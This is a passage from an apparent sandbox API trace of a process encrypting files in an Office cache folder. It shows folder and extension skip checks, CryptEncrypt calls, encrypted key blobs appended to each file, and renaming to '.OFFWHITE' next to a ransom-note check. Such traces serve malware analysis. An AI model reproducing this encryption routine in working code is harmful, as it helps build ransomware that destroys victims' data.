lpString2=".cab") returned 1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0087.167] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0087.167] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ProPlusrWW.xml", cAlternateFileName="PROPLU~1.XML")) returned 1 [0087.167] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2=".") returned 1 [0087.167] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="..") returned 1 [0087.167] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="...") returned 1 [0087.167] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="windows") returned -1 [0087.167] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="$recycle.bin") returned 1 [0087.167] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="rsa") returned -1 [0087.167] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="ntuser.dat") returned 1 [0087.168] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="programdata") returned 1 [0087.168] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="appdata") returned 1 [0087.168] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="program files") returned 1 [0087.168] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="program files (x86)") returned 1 [0087.168] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.168] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="ProPlusrWW.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" [0087.168] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.168] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.168] PathFindExtensionW (pszPath="ProPlusrWW.xml") returned=".xml" [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0087.168] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0087.168] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0087.168] GetProcessHeap () returned 0x500000 [0087.169] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547d28 [0087.169] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0087.173] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=16852) returned 1 [0087.173] GetProcessHeap () returned 0x500000 [0087.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0087.173] GetProcessHeap () returned 0x500000 [0087.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0087.173] GetProcessHeap () returned 0x500000 [0087.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0087.173] GetProcessHeap () returned 0x500000 [0087.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0087.173] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.173] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.173] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0087.173] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.173] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.173] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0087.173] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.173] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.173] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0087.174] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.174] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.174] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0087.174] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x41d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.174] SetLastError (dwErrCode=0x0) [0087.174] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.177] GetLastError () returned 0x0 [0087.177] GetLastError () returned 0x0 [0087.177] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x42d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.177] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.177] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x43d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.177] WriteFile (in: hFile=0x21c, lpBuffer=0x547d28*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547d28*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0087.177] GetProcessHeap () returned 0x500000 [0087.177] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x41d4) returned 0x5557b0 [0087.177] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.178] ReadFile (in: hFile=0x21c, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x41d4, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x41d4, lpOverlapped=0x0) returned 1 [0087.560] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.561] WriteFile (in: hFile=0x21c, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x41d4, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x41d4, lpOverlapped=0x0) returned 1 [0087.562] GetProcessHeap () returned 0x500000 [0087.562] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0087.562] CloseHandle (hObject=0x21c) returned 1 [0087.565] GetProcessHeap () returned 0x500000 [0087.565] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0087.565] GetProcessHeap () returned 0x500000 [0087.565] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0087.565] GetProcessHeap () returned 0x500000 [0087.565] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0087.565] GetProcessHeap () returned 0x500000 [0087.565] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0087.566] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" [0087.566] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.OFFWHITE" [0087.566] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.offwhite")) returned 1 [0087.568] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x262b2700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x262b2700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ffd0c0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xa97cbdb, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ProPrWW.cab", cAlternateFileName="")) returned 1 [0087.568] lstrcmpiW (lpString1="ProPrWW.cab", lpString2=".") returned 1 [0087.568] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="..") returned 1 [0087.568] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="...") returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="windows") returned -1 [0087.569] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="$recycle.bin") returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="rsa") returned -1 [0087.569] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="ntuser.dat") returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="programdata") returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="appdata") returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="program files") returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="program files (x86)") returned 1 [0087.569] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.569] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="ProPrWW.cab" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" [0087.569] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.569] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.569] PathFindExtensionW (pszPath="ProPrWW.cab") returned=".cab" [0087.569] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0087.569] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0087.569] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0087.569] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xc96ff40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xd49ee31, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ProPrWW2.cab", cAlternateFileName="")) returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2=".") returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="..") returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="...") returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="windows") returned -1 [0087.569] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="$recycle.bin") returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="rsa") returned -1 [0087.569] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="ntuser.dat") returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="programdata") returned 1 [0087.569] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="appdata") returned 1 [0087.570] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="program files") returned 1 [0087.570] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="program files (x86)") returned 1 [0087.570] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.570] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="ProPrWW2.cab" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" [0087.570] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.570] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.570] PathFindExtensionW (pszPath="ProPrWW2.cab") returned=".cab" [0087.570] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0087.570] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0087.570] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0087.570] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec13c00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbec13c00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x1682d290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0087.570] lstrcmpiW (lpString1="setup.exe", lpString2=".") returned 1 [0087.570] lstrcmpiW (lpString1="setup.exe", lpString2="..") returned 1 [0087.570] lstrcmpiW (lpString1="setup.exe", lpString2="...") returned 1 [0087.570] lstrcmpiW (lpString1="setup.exe", lpString2="windows") returned -1 [0087.570] lstrcmpiW (lpString1="setup.exe", lpString2="$recycle.bin") returned 1 [0087.570] lstrcmpiW (lpString1="setup.exe", lpString2="rsa") returned 1 [0087.570] lstrcmpiW (lpString1="setup.exe", lpString2="ntuser.dat") returned 1 [0087.570] lstrcmpiW (lpString1="setup.exe", lpString2="programdata") returned 1 [0087.571] lstrcmpiW (lpString1="setup.exe", lpString2="appdata") returned 1 [0087.571] lstrcmpiW (lpString1="setup.exe", lpString2="program files") returned 1 [0087.571] lstrcmpiW (lpString1="setup.exe", lpString2="program files (x86)") returned 1 [0087.571] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.571] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="setup.exe" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" [0087.571] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.571] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.571] PathFindExtensionW (pszPath="setup.exe") returned=".exe" [0087.571] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0087.571] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0087.571] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0087.571] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0087.571] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0087.571] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0087.571] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0087.571] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0087.571] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0087.571] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0087.571] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0087.571] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0087.571] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0087.571] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.571] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" [0087.571] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.571] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.572] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0087.572] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0087.572] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0087.572] GetProcessHeap () returned 0x500000 [0087.572] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547d38 [0087.572] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0087.573] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=31094) returned 1 [0087.573] GetProcessHeap () returned 0x500000 [0087.573] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0087.573] GetProcessHeap () returned 0x500000 [0087.573] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0087.573] GetProcessHeap () returned 0x500000 [0087.573] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0087.574] GetProcessHeap () returned 0x500000 [0087.574] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0087.574] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.574] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.574] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0087.574] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.574] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.574] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0087.574] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.574] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.574] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0087.574] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.574] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.574] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0087.575] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x7976, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.575] SetLastError (dwErrCode=0x0) [0087.575] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.582] GetLastError () returned 0x0 [0087.582] GetLastError () returned 0x0 [0087.582] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x7a76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.582] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.582] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x7b76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.582] WriteFile (in: hFile=0x21c, lpBuffer=0x547d38*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547d38*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0087.582] GetProcessHeap () returned 0x500000 [0087.582] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x7976) returned 0x5557b0 [0087.582] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.582] ReadFile (in: hFile=0x21c, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x7976, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x7976, lpOverlapped=0x0) returned 1 [0087.586] SetFilePointerEx (in: 